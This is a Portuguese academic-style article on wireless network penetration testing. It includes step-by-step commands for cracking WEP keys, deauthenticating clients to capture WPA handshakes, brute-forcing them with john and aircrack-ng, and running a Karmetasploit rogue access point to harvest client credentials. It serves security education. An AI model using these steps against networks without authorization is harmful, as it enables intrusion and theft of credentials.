Вы находитесь на странице: 1из 14

PEN-TEST COM ÊNFASE EM REDES WLAN

Patrick Melo
patrickimelo@hotmail.com

Faculdade de Tecnologia de Teresina – CET


Teresina-PI-Brasil
Abstract. Currently the wireless networks have remarkable growth both in the
corporate environment and in captivity, but the safety issue is an aspect that
deserves special attention, as a medium, but it is something that is not
widespread. The identification and exploitation of the vulnerabilities of
wireless networks (WLAN) are contained within the concept of penetration
testing (Pen-Test), conceptually the PEN-TEST can also be defined as a set of
techniques that we use to perform safety test. Holding PEN-TEST becomes an
important mechanism to evaluate qualitatively and quantitatively even security
problems that may be encountered. Must be used within a security planning
methodology with well defined and concise.

Resumo. Atualmente as redes sem fio têm notável crescimento tanto em meio
corporativo quanto em meio doméstico, contudo o quesito segurança é um
aspecto que merece uma atenção especial, dado determinado meio, porém é
algo que não é amplamente difundido. A identificação e exploração das
vulnerabilidades das redes sem-fio (WLAN) estão contidas no âmbito do
conceito dos testes de penetração (Pen-Test), conceitualmente o PEN-TEST
também pode ser definido como um conjunto de técnicas que podemos utilizar
para realização de teste de segurança. A realização de PEN-TEST torna-se
um mecanismo importante para avaliar de forma qualitativa e até mesmo
quantitativa os problemas de segurança que venham a ser encontrados. Deve
ser utilizado dentro de um planejamento de segurança bem definido e com
metodologia concisa.

Palavras-Chave: Redes, Wireless, Criptografia, Invasão, Internet, Pen-Test.

1. Introdução

O surgimento do serviço sem fio começou no século XIX, onde “o pai do rádio”
Guglielmo Marconi deu os primeiros passos fazendo testes em ondas de rádio, onde
criou a primeira fábrica de rádio de todo o mundo, que se chamava Wireless Telegraph
and Signal Company Limited. Já em 1901 aconteceu de receber sinais do outro lado do
atlântico, e em 1905 foi utilizado o código morse. Alguns anos após, surgiu então a
ALOHANET que foi a primeira rede de pacotes que usava rádio frequência no início dos
anos 70, era uma rede baseada em um terminal central que distribuía as mensagens, que
utilizava a topologia em estrela e fazia uso de CSMA.

Com essa nova tecnologia, o IEEE (Institute of Electrical and Eletronics


Engineers) constituiu um grupo de pesquisa para criar padrões abertos e tornar a

1
tecnologia sem fio cada vez mais presente. O projeto denominado de Padrão IEEE
802.11, nasceu em 1990, mas ficou inerte por aproximadamente sete anos devido a
fatores que não permitiam que a tecnologia sem fio saísse do papel. Um dos principais
fatores era a baixa taxa de transferência de dados que inicialmente a tecnologia oferecia,
que era entre 860Kbps à 2Mbps.

No decorrer do tempo a rede sem fio começou a ser vista como uma tecnologia
promissora e a receber ainda mais investimentos para a construção de equipamentos que
possibilitassem a comunicação sem fio entre computadores. Atualmente o foco das
redes de computadores sem fio (Wireless) se encontra no contexto das redes locais de
computadores (Wireless Local Area Network - WLAN), tanto em soluções proprietárias
como no padrão do IEEE. Primeiramente foram colocados em prática alguns padrões
proprietários, através de empresas como IBM, CISCO, Telecom e 3COM. Hoje essas e
outras empresas baseiam seus produtos no padrão do IEEE, devido às inúmeras e já
conhecidas vantagens que o padrão aberto oferece: interoperabilidade, baixo custo,
demanda de mercado, confiabilidade de projeto, entre outras. O padrão IEEE 802.11
define basicamente uma arquitetura para as WLANs que abrange os níveis: físico e
de enlace. No nível físico são tratadas apenas as transmissões com freqüência de rádio
(RF) e infravermelho (IR), embora outras formas de transmissão sem fio possam ser
usadas, como microondas e laser, por exemplo. No nível de enlace, o IEEE definiu um
protocolo de controle de acesso ao meio (protocolo MAC), bastante semelhante ao
protocolo usado em redes locais Ethernet (CSMA/CD).

2. Pen-Test

Quando se fala em segurança devem-se fazer algumas perguntas: Seguro contra o que?
Seguro contra quem? Seguro em que condições? Segurança pode ser definido como
dificultar ou impedir a ocorrência de eventos indesejáveis. A segurança da informação
consiste na proteção de um conjunto de dados a fim de preservar o valor que o mesmo
possui para um determinado indivíduo ou organização.

Entre diversos objetivos a segurança trata alguns princípios básicos que são:

Confidencialidade – Consiste em proteger a informação contra leitura e cópia


por alguém sem a devida autorização do proprietário da informação. Em redes de
computadores significa que no tráfego dos dados nenhuma informação poderá ser vista,
alterada ou capturada.

Autenticidade – Consiste na veracidade do emissor e receptor de informações


trocadas, geralmente implementada a partir de um mecanismo de senhas ou assinatura
digital.

Integridade - Consiste em proteger a informação contra modificação sem a


permissão explícita do proprietário daquela informação.

Disponibilidade - Consiste na proteção dos serviços prestados pelo sistema de


forma que eles não sejam degradados ou se tornem indisponíveis sem autorização,
assegurando ao usuário o acesso aos dados sempre que deles precisar.
2
Pen-test é um método que avalia a segurança de um sistema de computador ou
de uma rede, simulando um ataque de uma fonte maliciosa. O processo envolve uma
análise nas atividades do sistema, que envolvem a busca de alguma vulnerabilidade em
potencial que possa ser resultado de uma má configuração do sistema, falhas em
hardwares/softwares desconhecidas, deficiência no sistema operacional ou técnicas
contra medidas. Todas as análises submetidas pelos testes escolhidos são apresentadas
no sistema, junto com uma avaliação do seu impacto e muitas vezes com uma proposta
de resolução ou de uma solução técnica.

3. Quebrando Criptografia Wep

Neste artigo para quebra de criptografia WEP será utilizado o kismet, aireplay-ng e
aircrak-ng.

O Kismet é uma ferramenta passiva que trata a busca de informações e captura de


pacotes de uma determinada rede. Quando executada, sua interface de rede é
automaticamente inserida em modo promíscuo.

Usando o sistema operacional Ubuntu 9.10, o primeiro passo para se usar o


kismet é baixar o pacote e depois deve-se configurar o mesmo de acordo com o driver de
sua interface de rede, o arquivo de configuração é o “/etc/kismet/kismet.conf”.

#apt-get install kismet

Na linha “source=none,none,addme” altere para seguinte forma onde o primeiro


none é o driver usado pela sua placa de rede e segundo none é a sua interface e addme é
um apelido qualquer que pode-se dar a interface de rede.Quando o comando “kismet” é
executado em um terminal, você terá acesso a seguinte interface.

Figura 1. Visualização das redes

3
Pressione a tecla “backspace” e em seguida a tecla “s” e depois “b”, e selecione a
rede “alvo”, para obter informações sobre a rede “alvo” pressione a tecla “enter”.

Figura 2. Informações da rede alvo

Para efetuar a captura de pacotes devemos selecionar a rede “alvo” e ativar a


tecla “caps lock” e em seguida digitar “shift+l” para que o KISMET comece a captura.

Figura 3. Captura de pacotes

4
Agora para injetar tráfego na rede deve-se colocar a interface em modo
promíscuo no canal da rede alvo, onde wlan2 refere-se a interface de rede e 5 o canal
utilizado pela rede alvo, para isso utilizamos o seguinte comando:

#airmon-ng start wlan2 5

Utilize a ferramenta aireplay-ng para a injeção de tráfego na rede. O aireplay-ng


faz parte da suíte aircrack-ng. Para injetar tráfego na rede “alvo” é necessário obter
informações como o BSSID do AP alvo e endereço físico de sua interface de rede,
obtendo essa informação é só executar o seguinte comando em outro terminal:

#apt-get install aircrack-ng

#aireplay-ng -3 -b 00:02:6F:61:DE:0B -h 00-1F-1F-13-0E-52 wlan2

Onde 00:02:6F:61:DE:0B é o BSSID e o 00-1F-1F-13-0E-52 é o endereço físico


de sua interface de rede ou de algum cliente conectado.

Figura 4. Injeção de tráfego na rede

Os pacotes capturados pelo kismet se encontram no diretório “/var/log/kismet/”,


onde o arquivo utilizado para a descriptografar é o arquivo “Kismet-data-do-
teste.dump”.

5
Para a descriptografia utilize o aircrack-ng, Com outro terminal entre no
diretório onde se encontram os pacotes capturados, em seguida execute a ferramenta
selecionando a rede alvo.

#cd /var/log/kismet

#aircrack-ng <nome_do_arquivo.dump>

Figura 5. Selecionando a rede alvo

Em seguida será iniciado processo de descriptografia.

Figura 6. Descriptografando

6
4. Quebrando Criptografia WPA/WPA2

Na criptografia wpa, serão necessárias mais algumas ferramentas, contudo capture o


handshake e use-o para a descriptografia juntamente com ferramentas de força bruta ou
wordlists.

Para dar inicio a quebra da criptografia, utilize novamente o kismet, pelo


terminal, e identifique todas as informações precisas da rede, tais como SSID, BSSID,
tipo de chave, canal utilizado dentre outras.

Figura 7. Informações da rede alvo

7
Para visualizar os clientes que se encontram conectados à rede, pressione a tecla
“c”.

Figura 8. Clientes da rede alvo

Após a visualização dos clientes conectados, selecione um endereço mac de um


cliente conectado para forçar a desautenticação seguida da captura dos handshakes, com
os comandos a seguir:

#airmon-ng start <interface de rede> <canal>

#airodump-ng -w <nome do arquivo> -c <canal> <interface>

#aireplay-ng -0 1 -a <MAC DO AP> -c <MAC DO CLIENTE> <interface de rede>

Usando ataque de força bruta:

#john -incremental=digits --stdout | aircrack-ng -b <MAC DO ACCESS POINT> -w -


<NOME DO ARQUIVO.cap>
8
Figura 9. Resultado do ataque de força bruta

Usando Wordlist e mesclando com o john:

#john --stdout --incremental:all | aircrack-ng -b <MAC DO ACCESS POINT> -w -


<NOME DO ARQUIVO*.cap>

Figura 10. Resultado do ataque usando wordlist

Existem também outros tipos de ferramentas de ataque customizado que exigem


um pouco mais de conhecimento do atacante.

Neste caso será usada a distribuição Back track v4 que contém a suíte de
ferramentas Metasploit Framework, que conta com mais de 500 exploits para
exploração de vulnerabilidades, onde a escolhida foi o “Karma” que é um conjunto de

9
ferramentas para avaliar a segurança de clientes das redes sem fio em várias camadas, e
pode-se capturar credenciais ou explorar vulnerabilidades do lado do cliente no host.

Pré-Requisitos:

Você precisa ter a suíte aircrack-ng instalada, consulte http://www.aircrack-


ng.org/doku.php?id=install_aircrack

Karmetasploit requer um banco de dados back-end para estar no lugar antes que
ele possa ser usado, isso pode ser conseguido através da execução:

# gem install sqlite3-ruby activerecord

Figura 11. Instalação

Configuração Inicial:

A primeira coisa que precisamos é configurar um servidor dhcp, em


“/etc/dhcpd/dhcpd.conf”,

10
Figura 12. Configuração DHCP

Após a configuração do servidor dhcp devemos iniciar o serviço através do


comando a seguir:

# /etc/init.d/dhcp3-server start

Em seguida, atualize o banco de exploits do Metasploit, para isso entre no


diretório /pentest/exploits/framework3.

# cd / pentest/exploits/framework3

# svn update

Agora crie uma nova interface de modo monitor virtual:

# airmon-ng start wlan0

Obs: Isso irá criar um modo de interface mon0 monitor, use iwconfig para confirmar.

Agora crie o novo ponto de acesso:

# airbase-ng –c 11 –P -C 30 --essid "linksys"-v mon0

11
Figura 13. Criando um ponto de acesso

- c = canal

- P = responda a todas as sondas e cria falsos SSID’S

- C 30 = permitir balizamento de valores sondados ESSID (em segundos)

-- essid = especificar um único ESSID

mon0 = interface de modo monitor virtual

Adicione um ip a uma interface virtual através do comando:

# ifconfig at0 10.0.0.1 netmask 255.255.255.0 up

Edite o arquivo dhcp3-server que se encontra no diretório abaixo para que a


distribuição dos ips seja apenas pela interface at0

# vim /etc/default/dhcp3-server

INTERFACES="at0"

Logo após entre no diretório “/pentest/exploits/framework3” para atualizar o


banco do metasploit e rode o karmetasploit.

12
#svn update

# . /msfconsole –r karma.rc

Figura 14. Usando o Metasploit

5. Técnicas utilizadas

Network Scanning (varreduras);

Vulnerability Scanning (análises de vulnerabilidades);

Password Cracking (bruteforce);

Log Review (análise de logs);

Mitm Test (análise a partir da LAN);

War Driving (teste em sistema Wireless LAN);

Warchalking (teste em sistema Wireless LAN);

13
6. Técnicas Intrusivas

Exploração de vulnerabilidades conhecidas nos serviços identificados;

Exploração de Vulnerabilidades em aplicações Web;

Técnicas de Bruteforce para serviços e Cracking de Senhas;

Testes de Negação de Serviço (DOS);

Escalada de Privilégios;

7. Conclusão

Em geral, é comum encontrar redes sem fio desprovidas de segurança e passíveis de


serem facilmente invadidas, comprometendo assim toda a rede, onde atualmente toda a
informação digital tem um valor imensurável para o meio coorporativo, sendo que ter
seus dados capturados por um atacante é algo que pode gerar danos irreparáveis e fazer
um pen-test é algo a ser considerado para identificar as possíveis vulnerabilidades da
rede e as possibilidades de invasão. As redes sem fio são muito atraentes devido a sua
facilidade e comodidade, todavia o quesito segurança deve estar em primeiro lugar.

8. Referências

How Wi-Fi Works. Disponível em <http://computer.howstuffworks.com/wireless-


network.htm>. Acessado em 30.04.2010.

Novas Tecnologias de Redes. Disponível em


<http://www.guiadohardware.net/tutoriais/061/>. Acessado em 10.04.2010.

Entendendo (e quebrando) a Segurança em Redes Wireless. Disponível em


<http://www.guiadohardware.net/tutoriais/121/>. Acessado em 16.04.2010.

Plano de Atribuição, Destinação e Distribuição de Faixas de Freqüências no Brasil.


Disponível em
<http://www.anatel.gov.br/Tools/frame.asp?link=/biblioteca/planos/plano_atribuicao_2
006.pdf>. Acessado em 15.04.2010.
<http://www.ieee.org> Acessado em 11.04.2010

Guerrini, I. M., Luz: Fundamentos teóricos. Disponível


em<http://educar.sc.usp.br/otica/luz.htm>. Acessado em 08.05.2010.
<http://www.dec.ufcg.edu.br>. Acessado em 15.05.2010

14

Вам также может понравиться